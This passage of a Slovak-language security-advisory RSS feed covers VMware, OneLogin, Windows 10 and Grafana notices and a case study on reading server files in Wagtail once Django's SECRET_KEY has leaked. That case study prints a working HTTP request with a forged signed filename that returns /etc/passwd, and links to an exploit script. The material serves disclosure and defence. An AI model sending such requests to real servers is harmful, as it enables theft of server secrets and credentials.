<li>VMware Cloud Foundation, VMware vSphere Foundation 9.X.X.X vo verziách starších ako <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-9-0-and-later/9-0/release-notes/vmware-cloud-foundation-9-0-1-release-notes/nsx-9-0-1-0000.html">9.0.1.0</a></li>



<li>VMware Cloud Foundation 5.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a></li>



<li>VMware Cloud Foundation 4.5.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a></li>



<li>VMware Telco Cloud Infrastructure 3.X, 2.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article/411518">KB411518</a></li>



<li>VMware Telco Cloud Platform 5.X, 4.X, 3.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article/411518">KB411518</a></li>
</ul>



<p><strong>Pozn.: NSX a vCenter sú súčasťou VMware Cloud Foundation, VMware vSphere Foundation a VMware Telco Cloud, ktoré umožňuje prevádzkovanie aplikácií v privátnych alebo hybridných cloudoch.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<ul>
<li><strong>Centralizovaná platforma VMware vCenter:</strong></li>
</ul>



<p><strong>CVE-2025-41250&nbsp; </strong>(CVSSv3.1 skóre 8,5)</p>



<p><strong>Nedostatočné overovaní SMTP hlavičiek</strong> by vzdialený autentifikovaný útočník s oprávneniami na vytváranie plánovaných úloh mohol zneužiť na <strong>modifikáciu notifikačných e-mailov</strong> zasielaných ohľadne plánovaných úloh.</p>



<ul>
<li><strong>Sieťová virtualizačná platforma VMware NSX:</strong></li>
</ul>



<p><strong>CVE-2025-41251 &nbsp;</strong>(CVSSv3.1 skóre 8,1)</p>



<p>CVE-2025-41251 spočíva v <strong>nedostatočnom zabezpečení mechanizmu pre obnovu hesla</strong>, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>enumeráciu používateľských účtov</strong>.</p>



<p><strong>CVE-2025-41252&nbsp;&nbsp; </strong>(CVSSv3.1 skóre 7,5)</p>



<p>Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť v&nbsp;NSX taktiež možno bez autentifikácie zneužiť na <strong>enumeráciu používateľských účtov</strong>.</p>



<p><strong>Útočník by používateľské účty identifikované enumeráciou mohol zneužiť v&nbsp;rámci brute-force alebo slovníkových útokov, ktoré by v&nbsp;prípade úspešnosti viedli k&nbsp;získaniu neoprávneného prístupu do systému. </strong>Zraniteľnosti vo VMware NSX boli odhalené americkou NSA.<strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie:</p>



<ul>
<li>VMware vCenter <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/vcenter-server-update-and-patch-releases/vsphere-vcenter-server-70u3w-release-notes.html">7.0 U3w</a>, <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/vcenter-server-update-and-patch-release-notes/vsphere-vcenter-server-80u3g-release-notes.html">8.0 U3g</a> alebo <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-9-0-and-later/9-0/release-notes/vmware-cloud-foundation-9-0-1-release-notes/vcenter-9-0-1-0000.html">9.0.1.0</a></li>



<li>VMware Cloud Foundation, VMware vSphere Foundation <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-9-0-and-later/9-0/release-notes/vmware-cloud-foundation-9-0-1-release-notes/vcenter-9-0-1-0000.html">9.0.1.0</a></li>



<li>VMware Cloud Foundation <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-5-2-and-earlier/5-2/vcf-release-notes/vmware-cloud-foundation-522-release-notes.html">5.2.2</a> alebo <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/vcenter-server-update-and-patch-releases/vsphere-vcenter-server-70u3w-release-notes.html">7.0 U3w</a></li>



<li>VMware Telco Cloud Platform 5.X, 4.X, 3.x, 2.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article/411508">KB411508</a></li>



<li>VMware Telco Cloud Infrastructure 3.x, 2.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article/411508">KB411508</a></li>



<li>VMware NSX 4.2.2.2, 4.2.3.1 alebo 4.1.2.7</li>



<li>NSX-T 3.X vo verziách starších ako 3.2.4.3</li>



<li>VMware Cloud Foundation 5.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a></li>



<li>VMware Cloud Foundation 4.5.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a></li>



<li>VMware Telco Cloud Infrastructure 3.X, 2.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article/411518">KB411518</a></li>



<li>VMware Telco Cloud Platform 5.X, 4.X, 3.X s bezpečnostnou záplatou <a href="https://knowledge.broadcom.com/external/article/411518">KB411518</a></li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36150">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36150</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/broadcom-fixes-high-severity-vmware-nsx-bugs-reported-by-nsa/">https://www.bleepingcomputer.com/news/security/broadcom-fixes-high-severity-vmware-nsx-bugs-reported-by-nsa/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2881/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť riešenia OneLogin IAM možno zneužiť na extrakciu tajných hodnôt OIDC</title>
		<link>/posts/2878</link>
					<comments>/posts/2878#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 10 Oct 2025 15:24:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[One Identity]]></category>
		<category><![CDATA[OneLogin]]></category>
		<guid isPermaLink="false">/?p=2878</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/OneIdentity.png" alt="" /></p>Spoločnosť One Identity vydala bezpečnostné aktualizácie svojho IAM (Identity and Access Management) riešenia OneLogin, ktoré opravujú zraniteľnosť vysokej závažnosti. CVE-2025-59363...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/OneIdentity.png" alt="" /></p>
<p><strong>Spoločnosť One Identity vydala bezpečnostné aktualizácie svojho IAM (Identity and Access Management) riešenia OneLogin, ktoré opravujú zraniteľnosť vysokej závažnosti. CVE-2025-59363 umožňuje enumeráciu aplikácií a&nbsp;získanie tajných hodnôt OIDC (OpenID Connect). Tie možno následne zneužiť na získanie neoprávneného prístupu do systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>One Identity OneLogin vo verziách starších ako 2025.3.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-59363 </strong>(CVSSv3.1 skóre 7,7)</p>



<p>Vysoko závažná zraniteľnosť s&nbsp;identifikátorom <strong>CVE-2025-59363</strong> spočíva v nedostatočnej implementácii bezpečnostných mechanizmov v&nbsp;rámci API rozhrania. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek na /api/2/apps mohol zneužiť na <strong>enumeráciu a získanie tajných hodnôt OIDC (OpenID Connect) všetkých aplikácií v rámci tenanta OneLogin</strong>. Exfiltrované údaje by útočníci následne mohli zneužiť na <strong>impersonáciu používateľov</strong>, <strong>neoprávnený prístup do systémov</strong> a <strong>laterálny pohyb v infraštruktúre</strong>.</p>



<p><strong>Pozn.: Na uvedenú zraniteľnosť je v&nbsp;súčasnosti dostupný Proof of Concept kód demonštrujúci spôsob jej zneužitia.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu OneLogin na verziu 2025.3.0 a revokáciu všetkých tajných hodnôt, ktoré mohli uniknúť. Taktiež odporúčame vykonať kontrolu logov za účelom identifikácie pokusov o&nbsp;zneužitie zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://onelogin.service-now.com/support?id=kb_article&amp;sys_id=b0aad1e11bd3ea109a47ec29b04bcb72&amp;kb_category=a0d76d70db185340d5505eea4b96199f">https://onelogin.service-now.com/support?id=kb_article&amp;sys_id=b0aad1e11bd3ea109a47ec29b04bcb72&amp;kb_category=a0d76d70db185340d5505eea4b96199f</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59363">https://nvd.nist.gov/vuln/detail/CVE-2025-59363</a></li>



<li><a href="https://www.clutch.security/blog/onelogin-many-secrets-clutch-uncovers-vulnerability-exposing-client-credentials">https://www.clutch.security/blog/onelogin-many-secrets-clutch-uncovers-vulnerability-exposing-client-credentials</a></li>



<li><a href="https://thehackernews.com/2025/10/onelogin-bug-let-attackers-use-api-keys.html">https://thehackernews.com/2025/10/onelogin-bug-let-attackers-use-api-keys.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2878/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Končí podpora pre Windows 10. Čo ďalej?</title>
		<link>/posts/2874</link>
					<comments>/posts/2874#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Oct 2025 09:18:30 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Windows 10]]></category>
		<guid isPermaLink="false">/?p=2874</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft tento rok plánovane ukončí podporu pre všetky verzie Windows 10. Po 14. októbri 2025 už tieto produkty nebudú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p>Spoločnosť Microsoft tento rok plánovane ukončí podporu pre všetky verzie Windows 10. Po 14. októbri 2025 už tieto produkty nebudú dostávať aktualizácie zabezpečenia, aktualizácie nesúvisiace so zabezpečením, opravy chýb, technickú podporu a&nbsp;ani aktualizácie technického obsahu online. <strong>Po rokovaní s&nbsp;organizáciou Euroconsumers však v&nbsp;Európskom hospodárskom priestore predĺži pre nekomerčných používateľov bezplatnú podporu systémov Windows 10 o&nbsp;jeden rok, teda do októbra 2026. </strong>Spoločnosť to uskutoční poskytnutím svojho programu predĺženej podpory ESU (Extended Security Updates) pre spotrebiteľov zdarma.</p>



<p>Nekomerční používatelia budú dostávať bezpečnostné aktualizácie pre Windows 10 verzie 22H2 Home, Professional, Pro Education alebo Workstations do 13. októbra 2026. <strong>Podmienkou je prihlásenie sa do konta Microsoft. </strong>Konto musí byť správcovské a&nbsp;nemôže byť detské. Zaregistrovať do ESU sa môžete priamo cez službu Windows Update, kedykoľvek v&nbsp;priebehu jeho existencie.</p>



<p>Microsoft bezplatnú registráciu do programu ESU pre spotrebiteľov <strong>nebude ponúkať pre komerčné zariadenia</strong> v nasledujúcich scenároch:</p>



<ul>
<li>Zariadenia v celoobrazovkovom režime.</li>



<li>Zariadenia pripojené k doméne služby Active Directory alebo zariadenia, ktoré sú pripojené k Microsoft Entra.</li>



<li>Zariadenia, ktoré sú registrované v Microsoft Entra, ale môžu využívať program ESU pre spotrebiteľov.</li>



<li>Zariadenia zaregistrované v službe správy mobilných zariadení (MDM).</li>



<li>Zariadenia, ktoré už majú licenciu programu ESU.</li>



<li>Ak je zariadenie zaregistrované v programe ESU pre spotrebiteľov a potom sa zapojí do jedného z vyššie uvedených scenárov ESU pre komerčné použitie, bude registrácia do programu ESU pre spotrebiteľov na zariadení pozastavená, kým sa už nebude používať ako komerčné zariadenie.</li>
</ul>



<p>Pokiaľ zariadenie nemá nárok na bezplatnú registráciu do programu ESU pre spotrebiteľov, alebo nechcete využívať konto Microsoft, môžete predĺženú podporu získať za poplatok 30 USD za zariadenie pre nekomerčných a&nbsp;61 USD pre komerčných používateľov. Microsoft ponúka zľavu 90% na podporu ESU špeciálne pre školy.</p>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom systému Windows 10 odporúčame prejsť na novšiu verziu operačného systému alebo využívať rozšírenú podporu ESU (Extended Security Updates), pre ktorú je potrebné</p>



<ul>
<li>[Nekomerčné zariadenia] Zaregistrovať sa na danom zariadení cez konto Microsoft a&nbsp;ostať prihlásený týmto kontom. Viac informácií nájdete na <a href="https://www.microsoft.com/sk-sk/windows/extended-security-updates">stránke výrobcu</a>.<strong></strong></li>



<li>[Komerčné zariadenia] Zakúpiť si program ESU za 61 USD. Viac informácií nájdete na <a href="https://learn.microsoft.com/sk-sk/windows/whats-new/enable-extended-security-updates">stránke výrobcu</a>.<strong></strong></li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.euroconsumers.org/microsoft-security-windows-10-planned-obsolescence/">https://www.euroconsumers.org/microsoft-security-windows-10-planned-obsolescence/</a></li>



<li><a href="https://learn.microsoft.com/en-us/windows/whats-new/extended-security-updates">https://learn.microsoft.com/en-us/windows/whats-new/extended-security-updates</a></li>



<li><a href="https://learn.microsoft.com/sk-sk/windows/whats-new/enable-extended-security-updates">https://learn.microsoft.com/sk-sk/windows/whats-new/enable-extended-security-updates</a></li>



<li><a href="https://www.microsoft.com/sk-sk/windows/extended-security-updates">https://www.microsoft.com/sk-sk/windows/extended-security-updates</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2874/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kampaň zneužívajúca kritickú zraniteľnosť Grafana zasahuje Slovensko</title>
		<link>/posts/2866</link>
					<comments>/posts/2866#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 07 Oct 2025 12:54:56 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Grafana]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[kampaň]]></category>
		<guid isPermaLink="false">/?p=2866</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/hackers2.png" alt="" /></p>Aktuálna situácia: Dňa 28. septembra 2025 zaznamenala spoločnosť GreyNoise výrazný nárast pokusov o&#160;zneužitie zero-day zraniteľnosti CVE‑2021‑43798 v&#160;nástroji Grafana, ktorý umožňuje...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/hackers2.png" alt="" /></p>
<p><strong>Aktuálna situácia:</strong></p>



<p>Dňa 28. septembra 2025 zaznamenala spoločnosť GreyNoise výrazný nárast pokusov o&nbsp;zneužitie zero-day zraniteľnosti CVE‑2021‑43798 v&nbsp;nástroji Grafana, ktorý umožňuje útočníkovi využívať možnosť prechádzania adresárovej štruktúry (path traversal). Celkom 110 unikátnych IP adries sa v ten deň pokúsilo o útok voči monitorovaným inštanciám. Všetky identifikované IP adresy sú klasifikované ako škodlivé.</p>



<p><strong>Opis útoku/kampane:</strong></p>



<p><strong>CVE‑2021‑43798</strong> umožňuje prechádzanie adresárovej štruktúry. Pomocou slovníkového útoku, v ktorom útočník háda názvy modulov využitých v bežiacej inštancii Grafana, vie nájsť adresu nainštalovaného modulu, ktorú dokáže zneužiť na prístup k citlivým súborom na serveri.</p>



<p>V aktivitách z 28. septembra bol pozorovaný vzorec koordinovaného útoku:</p>



<ul>
<li>110 unikátnych IP adries v priebehu jedného dňa.</li>



<li>Cieľové destinácie útokov: Spojené štáty, Slovensko a Taiwan.</li>



<li>Aktéri hrozieb využívajú IP adresy, ktoré podľa geolokácie patria nasledujúcim krajinám: Bangladéš (107 IP), Čína (2 IP) a Nemecko (1 IP).</li>



<li>105 zo 107 IP z Bangladéša cielených primárne na americké koncové body.</li>



<li>Väčšina IP adries bola prvýkrát zaznamenaná priamo v deň útoku.</li>



<li>Jednotné použitie sieťových odtlačkov a využitie spoločných nástrojov naznačujú spoločný zoznam cieľových systémov.</li>
</ul>



<p>Nie je známe či útočníci hľadali konkrétne citlivé súbory no z&nbsp;povahy útoku je možné zneužiť zraniteľné verzie aj ako vstupný bod pre ďalšie útoky alebo testovanie účinnosti útoku do budúcna.</p>



<p>Kampaň má dosah aj na územie Slovenskej republiky, preto odporúčame administrátorom prijať nasledovné odporúčania.</p>



<p><strong>Odporúčania:<br></strong>Administrátorom odporúčame bezodkladnú bezpečnostnú aktualizáciu nástroja Grafana na stále podporované verzie, t.j. v&nbsp;dobe písania článku minimálne verzia 11. V&nbsp;systémoch, ktoré používajú verziu 8 a&nbsp;prechod na novšiu nie je možný, odporúčame bezodkladnú aktualizáciu na verzie obsahujúce záplatu t.j. 8.3.1, 8.2.7, 8.1.8, alebo 8.0.7 (podľa produkčných požiadaviek), aj pokiaľ nie sú priamo dostupné z&nbsp;internetu<strong>. Treba však zdôrazniť, že prevádzkovať nepodporovaný softvér v&nbsp;produkčnom prostredí aj bez prístupu na verejný internet je závažné bezpečnostné riziko.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.greynoise.io/blog/coordinated-grafana-exploitation-attempts">https://www.greynoise.io/blog/coordinated-grafana-exploitation-attempts</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/cve-2021-43798">https://nvd.nist.gov/vuln/detail/cve-2021-43798</a></li>



<li><a href="https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public">https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public</a></li>



<li><a href="https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p">https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2866/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Keď sa uniknutý SECRET_KEY platformy Django stane horším: prípadová štúdia Wagtail</title>
		<link>/posts/2861</link>
					<comments>/posts/2861#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 07 Oct 2025 12:21:38 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<category><![CDATA[Wagtail]]></category>
		<guid isPermaLink="false">/?p=2861</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/Wagtail-1024x728.png" alt="" /></p>Úvod V ekosystéme Django je SECRET_KEY sama o sebe veľmi citlivá hodnota. Jej únik zvyčajne umožňuje útočníkom falšovať tokeny, resetovať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/Wagtail-1024x728.png" alt="" /></p>
<h2 class="wp-block-heading"><strong>Úvod</strong></h2>



<p>V ekosystéme Django je <code><strong>SECRET_KEY</strong></code> sama o sebe veľmi citlivá hodnota. Jej únik zvyčajne umožňuje útočníkom falšovať tokeny, resetovať heslá alebo kradnúť relácie v určitých konfiguráciách. Pri skúmaní modulu <strong>redirects</strong> aplikácie Wagtail však náš kolega objavil prípad, keď by únik hodnoty <code><strong>SECRET_KEY</strong></code> mohol eskalovať nad rámec zneužitia používateľa/relácie a umožniť <strong>čítanie súborov na strane servera</strong>. Python skript na zneužitie tejto zraniteľnosti je k dispozícii na <a href="https://github.com/Habuon/wagtail-lfi" data-type="link" data-id="https://github.com/Habuon/wagtail-lfi">repozitári Github</a> nášho kolegu.</p>



<h2 class="wp-block-heading"><strong>Prehľad zraniteľnosti</strong></h2>



<p><strong>Súbor:</strong> <em>wagtail/contrib/redirects/tmp_storages.py</em><br><strong>Riadok:</strong> 72</p>



<p><code>return os.path.join(tempfile.gettempdir(), self.name)</code></p>



<p>Hodnota <strong>self.name</strong> pochádza z podpísaného parametra v požiadavke. Mechanizmus podpisovania síce zabezpečuje integritu, nesanitizuje však obsah. Ak útočník dokáže sfalšovať platné podpisy (čo je možné, ak vlastní Django <strong>SECRET_KEY</strong>), môže do požiadavky vložiť názvy súborov, ako napríklad <strong>/etc/passwd</strong>. Kód vloží túto neoverenú hodnotu do cesty súborového systému, čím účinne umožní prechádzanie mimo zamýšľaného dočasného adresára.</p>



<p><strong>Podmienky zneužitia</strong></p>



<p>Pre zneužitie tejto chyby musí útočník:</p>



<ol>
<li><strong>Poznať Django SECRET_KEY</strong> &#8211; už v&nbsp;tomto bode ide o&nbsp;závažné narušenie.</li>



<li><strong>Vlastniť platné konto pre Wagtail</strong> s&nbsp;oprávnením pridávať presmerovania.</li>



<li><strong>Vytvoriť škodlivý podpísaný názov súboru</strong> smerujúce na citlivé súbory.</li>
</ol>



<p>Ak sú tieto podmienky splnené, útočník môže zo servera exfiltrovať ľubovoľné súbory. Príklad požiadavky obsahujúcej platnú reláciu pre vysoko privilegovaného používateľa:</p>



<p><strong>Požiadavka HTTP:</strong><strong></strong></p>



<p><code>POST /admin/redirects/import/process/ HTTP/1.1<br>Host: localhost:8000<br>Cookie: csrftoken=JnnVucJbHd8qEaLPg1Sgr4jakrqxBJeO; sessionid=1y21vfn0g6thvfp06c2sooiu0symurie<br>Content-Length: 492<br>Content-Type: multipart/form-data; boundary=58070cece7e28a1b1230238d327e961c<br><br>--58070cece7e28a1b1230238d327e961c<br>Content-Disposition: form-data; name="csrfmiddlewaretoken"<br><br>f1Eii97cre31xBWPvNBkysKEXJL0iEAKOeR3CbGdYh1h1BxuBEjqPmTE701nJdEo<br>--58070cece7e28a1b1230238d327e961c<br>Content-Disposition: form-data; name="import_file_name"<br><br>/etc/passwd:EOyyi1lH0t4QL209IuRxanXgAstgxxxCA3NCAr4JPn8<br>--58070cece7e28a1b1230238d327e961c<br>Content-Disposition: form-data; name="input_format"<br><br>0:DmT0RMY6RdLc70Vt7wiYA32_Cl4z5UK1pBBI_ybYFGE<br>--58070cece7e28a1b1230238d327e961c--</code></p>



<p>Odpoveď na túto požiadavku obsahuje obsah požadovaného súboru <strong>/etc/passwd</strong>.</p>



<p><strong>Odpoveď HTTP:</strong><strong></strong></p>



<p><code>HTTP/1.1 200 OK<br>Server: WSGIServer/0.2 CPython/3.13.3<br>Content-Type: text/html; charset=utf-8<br>...<br>Content-Length: 38988<br><br>&lt;html lang="en-us" dir="ltr" class="w-theme-system w-density-default w-contrast-system">   <br>    ...<br>    &lt;form action="/admin/redirects/import/process/" method="POST" class="nice-padding" novalidate enctype="multipart/form-data"><br>    ...<br>        &lt;h2>Preview&lt;/h2><br>        &lt;table class="listing listing-with-x-scroll"><br>            &lt;thead><br>                &lt;tr>&lt;td>root:x:0:0:root:/root:/usr/bin/zsh&lt;/td>&lt;/tr><br>            &lt;/thead><br>            &lt;tbody><br>                    &lt;tr>&lt;td>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin&lt;/td>&lt;/tr><br>                    ...<br>                    &lt;tr>&lt;td>redis:x:129:131::/var/lib/redis:/usr/sbin/nologin&lt;/td>&lt;/tr><br>                    &lt;tr>&lt;td>kali:x:1000:1000::/home/kali:/usr/bin/zsh&lt;/td>&lt;/tr><br>            &lt;/tbody><br>        &lt;/table><br>    &lt;/form><br>    ...<br>&lt;/html></code></p>



<p><strong>Bezpečnostný dopad</strong></p>



<p>Hoci kompromitácia <strong>SECRET_KEY</strong> je sama o sebe katastrofálna, typické útoky zostávajú na <strong>úrovni aplikácie/používateľa</strong> (falšovanie relácie, podpisovanie tokenov). Táto zraniteľnosť zvyšuje dopad jej rozšírením na <strong>úroveň servera</strong>, čím umožňuje prístup k:</p>



<ul>
<li>Súborom prostredia (<strong>.env</strong>)</li>



<li>Zdrojovému kódu</li>



<li>Súkromným kľúčom (SSH, prihlasovacie údaje API)</li>



<li>Konfiguračným súborom</li>
</ul>



<p>Tým sa únik kryptografického kľúča zmení na problém <strong>lokálneho začlenenia súboru (LFI)</strong>.</p>



<p><strong>Príkladový scenár – zverejnený .git a uniknutý SECRET_KEY</strong></p>



<p>Reálny a bežný spôsob, ako môže uniknúť <strong>SECRET_KEY</strong>, je náhodný „commit“ kódu verejne dostupný na serveri, obsahujúci konfiguračné súbory, adresáre <strong>.env</strong> a <strong>.git</strong>, alebo exponovaná záloha. Predstavte si, že vývojár omylom „pushne“ súbor <strong>settings.py</strong> obsahujúci <strong>SECRET_KEY</strong>. Útočník, ktorý si naklonuje repozitár alebo získa vypublikované údaje v adresári <strong>.git</strong>, môže ľahko získať súbor <strong>SECRET_KEY</strong> a ďalšie citlivé konfiguračné hodnoty.</p>



<p>V tejto situácii sa zraniteľnosť, o ktorej sme hovorili, podstatne zhoršuje. S uniknutým kľúčom <strong>SECRET_KEY</strong> môže útočník, ktorý tiež ovláda (alebo kompromituje) účet Wagtail s dostatočnými oprávneniami, sfalšovať podpísaný názov súboru a použiť koncový bod importu na čítanie ľubovoľných súborov zo servera. Táto možnosť čítania súborov môže útočníkovi umožniť získať ďalšie tajomstvá &#8211; napríklad súbory .env, databázové poverenia, kľúče SSH alebo tokeny API &#8211; čo môže následne umožniť úplnú kompromitáciu servera. Stručne povedané: počiatočný únik repozitára, ktorý odhalí <strong>SECRET_KEY</strong>, môže v kombinácii s nekontrolovaným používaním názvov súborov prerásť do úplného narušenia.</p>



<p><strong>Tipy pre detekciu</strong></p>



<ul>
<li>Preskenujte históriu „commitov“, či neexistujú také, ktoré obsahujú settings.py, .env alebo iný súbor obsahujúci <strong>SECRET_KEY</strong>.</li>



<li>Na serveri hľadajte neočakávané prístupy k&nbsp;administrátorským koncovým bodom (koncové body importu, presmerovanie importu) a neobvyklé čítanie súborov webovým procesom.</li>



<li>Skontrolujte v&nbsp;logoch požiadavky na koncový bod importu, ktoré obsahujú neobvyklé reťazce názvov súborov obsahujúce ../, absolútne cesty alebo dlhé segmenty ciest.</li>
</ul>



<p><strong>Okamžitá náprava pri zistení úniku</strong></p>



<ol>
<li>Bezodkladne zmeňte <strong>SECRET_KEY</strong> a&nbsp;počítajte s&nbsp;vedľajšími účinkami (zneplatnite podpísané cookies/tokeny).</li>



<li>Zmeňte všetky ostatné tajomstvá, ktoré sa nachádzajú v&nbsp;repozitári alebo na serveri (heslá k&nbsp;databáze, API kľúče, SSH kľúče).</li>



<li>Odstráňte vypublikované súbory <strong>.git</strong> resp. akékoľvek citlivé súbory z verejného prístupu a prepíšte históriu, ak je to možné (napr. git filter-repo alebo bfg). Upozorňujeme, že samotné odstránenie súboru z repozitára ho z histórie neodstráni.</li>



<li>Vynúťte zmenu hesiel pre administrátorských používateľov, pokiaľ máte podozrenie na falšovanie relácií alebo tokenov.</li>



<li>Preverte a&nbsp;monitorujte podozrivú aktivitu administrátorov a&nbsp;nové neznáme kľúče zaznamenané v&nbsp;logoch a&nbsp;konfiguračných súboroch.</li>
</ol>



<p><strong>Hodnotenie CVSS</strong></p>



<p>Zraniteľnosť sme vyhodnotili podľa metodiky CVSS v3.1 nasledovne:</p>



<p><code>AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N</code></p>



<p><strong>Base Score:</strong> 5.8 (Medium)</p>



<p>Hoci útok vyžaduje vysoké oprávnenia a predchádzajúcu kompromitáciu kľúča <strong>SECRET_KEY</strong>, má vysoký dopad na dôvernosť kvôli odhaleniu súborov servera.</p>



<p><strong>Širšia lekcia</strong></p>



<p>Tento prípad nie je o tom, že by bol systém Wagtail v&nbsp;štandardne dodávanom nastavení nezabezpečený. Je o tom, že <strong>dôvera v kryptografické podpisy nesmie nahradiť základné overovanie vstupov</strong>. Aj keď sú parametre podpísané, ich obsah stále potrebuje sanitizáciu. Dôležitá je viacvrstvová obrana (Defense in depth).</p>



<p><strong>Časová línia</strong></p>



<ul>
<li><strong>2025-09:</strong> identifikovaná chyba a nahlásená Wagtail Security.</li>



<li><strong>2025-09:</strong> bezpečnostný tím vyhodnotil nález, že sa nejedná o&nbsp;zraniteľnosť (vzhľadom na to, že únik <strong>SECRET_KEY</strong> je sám o&nbsp;sebe katastrofický), no súhlasil, že kód je potrebné zabezpečiť.</li>
</ul>



<p><strong>Záver</strong> </p>



<p>Hoci si tento problém vyžaduje splnenie viacerých predpokladov a nemožno ho považovať za formálnu zraniteľnosť, poukazuje na málo viditeľnú, ale dôležitú bezpečnostnú lekciu. Vývojári by mali overovať a obmedzovať názvy súborov bez ohľadu na podpisovanie a považovať kľúč <strong>SECRET_KEY</strong> za kritickú súčasť bezpečnostnej politiky aplikácie.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2861/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností september 2025</title>
		<link>/posts/2838</link>
					<comments>/posts/2838#respond</comments>
		
